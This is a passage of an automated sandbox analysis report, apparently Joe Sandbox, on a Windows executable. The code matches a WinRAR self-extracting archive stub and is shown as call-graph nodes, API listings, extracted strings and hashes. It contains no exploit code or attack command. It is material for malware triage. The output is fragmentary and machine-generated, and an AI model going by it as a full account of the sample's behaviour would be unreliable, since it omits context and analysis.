23037->23038 23055 82895a 20 API calls __dosmaperr 23037->23055 23038->23021 23040 8282b4 23056 828839 26 API calls pre_c_initialization 23040->23056 23042 8282bf 23042->23021 23044 81e60e 23043->23044 23047 81e613 ___scrt_initialize_onexit_tables 23043->23047 23044->23047 23057 81ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23044->23057 23046 81e696 23047->23025 23058 81e766 23048->23058 23051->23031 23052->23033 23053->23035 23054->23026 23055->23040 23056->23042 23057->23046 23059 81e783 23058->23059 23060 81e78a 23058->23060 23064 827f1a 29 API calls __onexit 23059->23064 23065 827f8a 29 API calls __onexit 23060->23065 23063 81e788 23063->23028 23064->23063 23065->23063 24974 801f05 126 API calls __EH_prolog 24928 81ec0b 28 API calls 2 library calls 24976 81db0b 19 API calls ___delayLoadHelper2@8 23071 81c40e 23072 81c4c7 23071->23072 23080 81c42c _wcschr 23071->23080 23073 81c4e5 23072->23073 23089 81be49 _wcsrchr 23072->23089 23126 81ce22 23072->23126 23076 81ce22 18 API calls 23073->23076 23073->23089 23076->23089 23077 81ca8d 23079 8117ac CompareStringW 23079->23080 23080->23072 23080->23079 23081 81c11d SetWindowTextW 23081->23089 23086 81bf0b SetFileAttributesW 23088 81bfc5 GetFileAttributesW 23086->23088 23099 81bf25 ___scrt_get_show_window_mode 23086->23099 23088->23089 23091 81bfd7 DeleteFileW 23088->23091 23089->23077 23089->23081 23089->23086 23092 81c2e7 GetDlgItem SetWindowTextW SendMessageW 23089->23092 23095 81c327 SendMessageW 23089->23095 23100 8117ac CompareStringW 23089->23100 23101 81aa36 23089->23101 23105 819da4 GetCurrentDirectoryW 23089->23105 23110 80a52a 7 API calls 23089->23110 23111 80a4b3 FindClose 23089->23111 23112 81ab9a 76 API calls ___std_exception_copy 23089->23112 23113 8235de 23089->23113 23091->23089 23093 81bfe8 23091->23093 23092->23089 23107 80400a 23093->23107 23095->23089 23097 81c01d MoveFileW 23097->23089 23098 81c035 MoveFileExW 23097->23098 23098->23089 23099->23088 23099->23089 23106 80b4f7 52 API calls 2 library calls 23099->23106 23100->23089 23102 81aa40 23101->23102 23103 81aaf3 ExpandEnvironmentStringsW 23102->23103 23104 81ab16 23102->23104 23103->23104 23104->23089 23105->23089 23106->23099 23149 803fdd 23107->23149 23110->23089 23111->23089 23112->23089 23114 828606 23113->23114 23115 828613 23114->23115 23116 82861e 23114->23116 23221 828518 23115->23221 23117 828626 23116->23117 23124 82862f __CreateFrameInfo 23116->23124 23119 8284de _free 20 API calls 23117->23119 23122 82861b 23119->23122 23120 828634 23228 82895a 20 API calls __dosmaperr 23120->23228 23121 828659 HeapReAlloc 23121->23122 23121->23124 23122->23089 23124->23120 23124->23121 23229 8271ad 7 API calls 2 library calls 23124->23229 23128 81ce2c ___scrt_get_show_window_mode 23126->23128 23127 81d08a 23127->23073 23128->23127 23129 81cf1b 23128->23129 23235 8117ac CompareStringW 23128->23235 23232 80a180 23129->23232 23133 81cf4f ShellExecuteExW 23133->23127 23136 81cf62 23133->23136 23135 81cf47 23135->23133 23137 81cf9b 23136->23137 23138 81cff1 CloseHandle 23136->23138 23141 81cf91 ShowWindow 23136->23141 23237 81d2e6 6 API calls 23137->23237 23139 81cfff 23138->23139 23140 81d00a 23138->23140 23238 8117ac CompareStringW 23139->23238 23140->23127 23145 81d081 ShowWindow 23140->23145 23141->23137 23144 81cfb3 23144->23138 23146 81cfc6 GetExitCodeProcess 23144->23146 23145->23127 23146->23138 23147 81cfd9 23146->23147 23147->23138 23150 803ff4 __vsnwprintf_l 23149->23150 23153 825759 23150->23153 23156 823837 23153->23156 23157 823877 23156->23157 23158 82385f 23156->23158 23157->23158 23160 82387f 23157->23160 23173 82895a 20 API calls __dosmaperr 23158->23173 23175 823dd6 23160->23175 23161 823864 23174 828839 26 API calls pre_c_initialization 23161->23174 23165 81ec4a _ValidateLocalCookies 5 API calls 23167 803ffe GetFileAttributesW 23165->23167 23167->23093 23167->23097 23168 823907 23184 824186 51 API calls 4 library calls 23168->23184 23171 82386f 23171->23165 23172 823912 23185 823e59 20 API calls _free 23172->23185 23173->23161 23174->23171 23176 823df3 23175->23176 23182 82388f 23175->23182 23176->23182 23186 828fa5 GetLastError 23176->23186 23178 823e14 23207 8290fa 38 API calls __cftof 23178->23207 23180 823e2d 23208 829127 38 API calls __cftof 23180->23208 23183 823da1 20 API calls 2 library calls 23182->23183 23183->23168 23184->23172 23185->23171 23187 828fc7 23186->23187 23188 828fbb 23186->23188 23210 8285a9 20 API calls 3 library calls 23187->23210 23209 82a61b 11 API calls 2 library calls 23188->23209 23191 828fc1 23191->23187 23193 829010 SetLastError 23191->23193 23192 828fd3 23194 828fdb 23192->23194 23217 82a671 11 API calls 2 library calls 23192->23217 23193->23178 23211 8284de 23194->23211 23197 828ff0 23197->23194 23199 828ff7 23197->23199 23198 828fe1 23200 82901c SetLastError 23198->23200 23218 828e16 20 API calls FindHandler 23199->23218 23219 828566 38 API calls _abort 23200->23219 23203 829002 23205 8284de _free 20 API calls 23203->23205 23206 829009 23205->23206 23206->23193 23206->23200 23207->23180 23208->23182 23209->23191 23210->23192 23212 828512 _free 23211->23212 23213 8284e9 RtlFreeHeap 23211->23213 23212->23198 23213->23212 23214 8284fe 23213->23214 23220 82895a 20 API calls __dosmaperr 23214->23220 23216 828504 GetLastError 23216->23212 23217->23197 23218->23203 23220->23216 23222 828556 23221->23222 23227 828526 __CreateFrameInfo 23221->23227 23231 82895a 20 API calls __dosmaperr 23222->23231 23224 828541 RtlAllocateHeap 23225 828554 23224->23225 23224->23227 23225->23122 23227->23222 23227->23224 23230 8271ad 7 API calls 2 library calls 23227->23230 23228->23122 23229->23124 23230->23227 23231->23225 23239 80a194 23232->23239 23235->23129 23236 80b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23236->23135 23237->23144 23238->23140 23247 81e360 23239->23247 23242 80a1b2 23249 80b66c 23242->23249 23243 80a189 23243->23133 23243->23236 23245 80a1c6 23245->23243 23246 80a1ca GetFileAttributesW 23245->23246 23246->23243 23248 80a1a1 GetFileAttributesW 23247->23248 23248->23242 23248->23243 23250 80b679 23249->23250 23258 80b683 23250->23258 23259 80b806 CharUpperW 23250->23259 23252 80b692 23260 80b832 CharUpperW 23252->23260 23254 80b6a1 23255 80b6a5 23254->23255 23256 80b71c GetCurrentDirectoryW 23254->23256 23261 80b806 CharUpperW 23255->23261 23256->23258 23258->23245 23259->23252 23260->23254 23261->23258 24977 806110 80 API calls 24978 82b710 GetProcessHeap 24979 82a918 27 API calls 2 library calls 24980 81be49 108 API calls 4 library calls 24929 801025 29 API calls pre_c_initialization 23277 809f2f 23278 809f44 23277->23278 23279 809f3d 23277->23279 23280 809f4a GetStdHandle 23278->23280 23287 809f55 23278->23287 23280->23287 23281 809fa9 WriteFile 23281->23287 23282 809f7a 23283 809f7c WriteFile 23282->23283 23282->23287 23283->23282 23283->23287 23285 80a031 23289 807061 75 API calls 23285->23289 23287->23279 23287->23281 23287->23282 23287->23283 23287->23285 23288 806e18 60 API calls 23287->23288 23288->23287 23289->23279 24930 81a430 73 API calls 24986 81be49 103 API calls 4 library calls 24988 81be49 98 API calls 3 library calls 24931 81ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24932 818c40 GetClientRect 24933 823040 5 API calls 2 library calls 24934 830040 IsProcessorFeaturePresent 24989 81d34e DialogBoxParamW 24990 819b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24937 828050 8 API calls ___vcrt_uninitialize 24062 809b59 24063 809bd7 24062->24063 24066 809b63 24062->24066 24064 809bad SetFilePointer 24064->24063 24065 809bcd GetLastError 24064->24065 24065->24063 24066->24064 24939 81fc60 51 API calls 2 library calls 24941 823460 RtlUnwind 24942 829c60 71 API calls _free 24943 829e60 31 API calls 2 library calls 24881 81d573 24882 81d580 24881->24882 24883 80ddd1 53 API calls 24882->24883 24884 81d594 24883->24884 24885 80400a _swprintf 51 API calls 24884->24885 24886 81d5a6 SetDlgItemTextW 24885->24886 24887 81ac74 5 API calls 24886->24887 24888 81d5c3 24887->24888 24948 801075 82 API calls pre_c_initialization 24949 815c77 121 API calls __vswprintf_c_l

              Control-flow Graph

              APIs
                • Part of subcall function 008100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008100E4
                • Part of subcall function 008100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008100F6
                • Part of subcall function 008100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00810127
                • Part of subcall function 00819DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00819DAC
                • Part of subcall function 0081A335: OleInitialize.OLE32(00000000), ref: 0081A34E
                • Part of subcall function 0081A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0081A385
                • Part of subcall function 0081A335: SHGetMalloc.SHELL32(00848430), ref: 0081A38F
                • Part of subcall function 008113B3: GetCPInfo.KERNEL32(00000000,?), ref: 008113C4
                • Part of subcall function 008113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008113D8
              • GetCommandLineW.KERNEL32 ref: 0081D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0081D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0081D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 0081D68E
                • Part of subcall function 0081D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0081D29D
                • Part of subcall function 0081D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0081D2D9
              • CloseHandle.KERNEL32(00000000), ref: 0081D697
              • GetModuleFileNameW.KERNEL32(00000000,0085DC90,00000800), ref: 0081D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,0085DC90), ref: 0081D6BE
              • GetLocalTime.KERNEL32(?), ref: 0081D6C9
              • _swprintf.LIBCMT ref: 0081D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0081D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 0081D721
              • LoadIconW.USER32(00000000,00000064), ref: 0081D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0081D789
              • Sleep.KERNEL32(?), ref: 0081D7B7
              • DeleteObject.GDI32 ref: 0081D7F0
              • DeleteObject.GDI32(?), ref: 0081D800
              • CloseHandle.KERNEL32 ref: 0081D843
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-2656992072
              • Opcode ID: 6fdd022faeb268873f1c9d6884dcc00f488cecb77692ce898ec52693d7b6f40b
              • Instruction ID: d477dbfaf10f28bcd46af0ac718bb6206962540685694772cc4beda28b4198ba
              • Opcode Fuzzy Hash: 6fdd022faeb268873f1c9d6884dcc00f488cecb77692ce898ec52693d7b6f40b
              • Instruction Fuzzy Hash: 1A61A271904341EFD320ABA9EC49FAB77ACFF45755F000829F945D2291DB78D988CBA2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 770 819e1c-819e38 FindResourceW 771 819f2f-819f32 770->771 772 819e3e-819e50 SizeofResource 770->772 773 819e70-819e72 772->773 774 819e52-819e61 LoadResource 772->774 776 819f2e 773->776 774->773 775 819e63-819e6e LockResource 774->775 775->773 777 819e77-819e8c GlobalAlloc 775->777 776->771 778 819e92-819e9b GlobalLock 777->778 779 819f28-819f2d 777->779 780 819f21-819f22 GlobalFree 778->780 781 819ea1-819ebf call 81f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 819ec1-819ee3 call 819d7b 781->784 785 819f1a-819f1b GlobalUnlock 781->785 784->785 790 819ee5-819eed 784->790 785->780 791 819f08-819f16 790->791 792 819eef-819f03 GdipCreateHBITMAPFromBitmap 790->792 791->785 792->791 793 819f05 792->793 793->791
              APIs
              • FindResourceW.KERNEL32(0081AE4D,PNG,?,?,?,0081AE4D,00000066), ref: 00819E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0081AE4D,00000066), ref: 00819E46
              • LoadResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E59
              • LockResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0081AE4D,00000066), ref: 00819E82
              • GlobalLock.KERNEL32(00000000), ref: 00819E93
              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00819EB7
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00819EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00819F1B
              • GlobalFree.KERNEL32(00000000), ref: 00819F22
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
              • String ID: PNG
              • API String ID: 3656887471-364855578
              • Opcode ID: 4ab844087d3361ba7aca384bddbee5864f74c1ec21a81443c3c158a2ee04fa74
              • Instruction ID: 4fdfcdb7707383371c31574b1d11698090cc6534cb98af629b7e2e5d2f6dde3a
              • Opcode Fuzzy Hash: 4ab844087d3361ba7aca384bddbee5864f74c1ec21a81443c3c158a2ee04fa74
              • Instruction Fuzzy Hash: 1931A275204706AFC7109F21EC5896BBFADFF89751B040928F946D2260EF75DC41CBA1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 979 80a5f4-80a61f call 81e360 982 80a691-80a69a FindNextFileW 979->982 983 80a621-80a632 FindFirstFileW 979->983 984 80a6b0-80a6b2 982->984 985 80a69c-80a6aa GetLastError 982->985 986 80a6b8-80a75c call 80fe56 call 80bcfb call 810e19 * 3 983->986 987 80a638-80a64f call 80b66c 983->987 984->986 988 80a761-80a774 984->988 985->984 986->988 994 80a651-80a668 FindFirstFileW 987->994 995 80a66a-80a673 GetLastError 987->995 994->986 994->995 996 80a684 995->996 997 80a675-80a678 995->997 1000 80a686-80a68c 996->1000 997->996 999 80a67a-80a67d 997->999 999->996 1002 80a67f-80a682 999->1002 1000->988 1002->1000
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A692
              • GetLastError.KERNEL32(?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A69E
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 6539709e5729f5caef4c9c17c3a25aceeeab69f6772d617cc94eabc8538fd254
              • Instruction ID: 102fdc59265cedc63d5e522e0c72fd68952f2642d2e2dfa2a3974b32236ece27
              • Opcode Fuzzy Hash: 6539709e5729f5caef4c9c17c3a25aceeeab69f6772d617cc94eabc8538fd254
              • Instruction Fuzzy Hash: 96416F72504745AFC364EF68CC84ADAF7F8FF98340F040A29F5A9D3250D775A9948B92
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002,00000000), ref: 0082755E
              • TerminateProcess.KERNEL32(00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002,00000000), ref: 00827565
              • ExitProcess.KERNEL32 ref: 00827577
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 071504ae7d7ea8e3120d1fcff75942e6c9a32dd36819cfe6cd9fab5afd01c09c
              • Instruction ID: ce1745529b4b188ea6fd680f11c2f0cc8db6ffea6387b110e2a3b56bcdd15540
              • Opcode Fuzzy Hash: 071504ae7d7ea8e3120d1fcff75942e6c9a32dd36819cfe6cd9fab5afd01c09c
              • Instruction Fuzzy Hash: FCE0EC31004958AFCF15AF69EE19A497F69FF84741F108824F905CA232CB35DE82CB51
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: c3a285d907d5467c2c31477d821730ae5d8c9621eaf248447d7a91c27087eb6c
              • Instruction ID: adba5ea1b8d059430c0a216c8ea33859b4769294939c22fbb3304947a0ca5e5a
              • Opcode Fuzzy Hash: c3a285d907d5467c2c31477d821730ae5d8c9621eaf248447d7a91c27087eb6c
              • Instruction Fuzzy Hash: F0820430904245EEDF65DB64CC85AFABBA9FF15300F0841B9E8D9DB1C3DB215A88CB61
              APIs
              • __EH_prolog.LIBCMT ref: 0081AEE5
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-3472986185
              • Opcode ID: 5d6d9eae344b42e8669a34d06704391834445438eb298d17653ad0febf79abcb
              • Instruction ID: 38f4f22625a8cd5ce215e756245a8d69087764dc4b4ce75cb40fabb60f192894
              • Opcode Fuzzy Hash: 5d6d9eae344b42e8669a34d06704391834445438eb298d17653ad0febf79abcb
              • Instruction Fuzzy Hash: 6242C1B0944644BEEB25ABA4DC8AFEE7B7CFF02705F000095F645E61D1CBB85984CB66

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 257 8100cf-8100ee call 81e360 GetModuleHandleW 260 8100f0-810107 GetProcAddress 257->260 261 810154-8103b2 257->261 264 810121-810131 GetProcAddress 260->264 265 810109-81011f 260->265 262 810484-8104b3 GetModuleFileNameW call 80bc85 call 80fe56 261->262 263 8103b8-8103c3 call 8270dd 261->263 279 8104b5-8104bf call 80acf5 262->279 263->262 273 8103c9-8103fa GetModuleFileNameW CreateFileW 263->273 264->261 268 810133-810152 264->268 265->264 268->261 276 810478-81047f CloseHandle 273->276 277 8103fc-81040a SetFilePointer 273->277 276->262 277->276 280 81040c-810429 ReadFile 277->280 285 8104c1-8104c5 call 810085 279->285 286 8104cc 279->286 280->276 282 81042b-810450 280->282 284 81046d-810476 call 80fbd8 282->284 284->276 291 810452-81046c call 810085 284->291 292 8104ca 285->292 289 8104ce-8104d0 286->289 293 8104f2-810518 call 80bcfb GetFileAttributesW 289->293 294 8104d2-8104f0 CompareStringW 289->294 291->284 292->289 297 81051a-81051e 293->297 301 810522 293->301 294->293 294->297 297->279 299 810520 297->299 302 810526-810528 299->302 301->302 303 810560-810562 302->303 304 81052a 302->304 306 810568-81057f call 80bccf call 80acf5 303->306 307 81066f-810679 303->307 305 81052c-810552 call 80bcfb GetFileAttributesW 304->305 313 810554-810558 305->313 314 81055c 305->314 317 810581-8105e2 call 810085 * 2 call 80ddd1 call 80400a call 80ddd1 call 819f35 306->317 318 8105e7-81061a call 80400a AllocConsole 306->318 313->305 316 81055a 313->316 314->303 316->303 323 810667-810669 ExitProcess 317->323 318->323 324 81061c-810661 GetCurrentProcessId AttachConsole call 8235b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->324 324->323
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 008100E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008100F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00810127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008103D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008103F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00810402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00833BA4,00000000), ref: 00810421
              • CloseHandle.KERNEL32(00000000), ref: 00810479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0081048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008104E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00810510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0081054A
                • Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
                • Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2
              • _swprintf.LIBCMT ref: 008105BE
              • _swprintf.LIBCMT ref: 0081060A
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
              • AllocConsole.KERNEL32 ref: 00810612
              • GetCurrentProcessId.KERNEL32 ref: 0081061C
              • AttachConsole.KERNEL32(00000000), ref: 00810623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00810649
              • WriteConsoleW.KERNEL32(00000000), ref: 00810650
              • Sleep.KERNEL32(00002710), ref: 0081065B
              • FreeConsole.KERNEL32 ref: 00810661
              • ExitProcess.KERNEL32 ref: 00810669
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 558f6a0136b06af741eb061037b654fa37e60fa5f1a98cd19b6fb849b07cbecb
              • Instruction ID: 13934c182909d1c32e29b78f378751a7fe20bd7e6d175ba17fb1976baa3326e8
              • Opcode Fuzzy Hash: 558f6a0136b06af741eb061037b654fa37e60fa5f1a98cd19b6fb849b07cbecb
              • Instruction Fuzzy Hash: 25D14AB1508784ABD7249F94DC49BDBBAE8FFC4705F40091DF689D6250DBB4868C8FA2

              Control-flow Graph

              • Executed
              • Not Executed
